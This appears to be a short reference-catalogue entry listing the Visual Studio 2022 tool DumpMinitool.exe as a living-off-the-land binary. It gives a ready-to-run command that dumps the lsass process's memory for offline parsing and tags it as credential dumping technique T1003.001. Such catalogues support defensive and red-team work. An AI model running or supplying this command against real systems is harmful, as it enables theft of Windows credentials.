.. /DumpMinitool.exe
Star

Dump

Dump tool part Visual Studio 2022


Paths:

Resources:
Acknowledgements:

Detection:

Dump

  1. Creates a memory dump of the lsass process

    DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full
    Use case
    Create memory dump and parse it offline
    Privileges required
    Administrator
    Operating systems
    Windows 10, Windows 11
    ATT&CK® technique
    T1003.001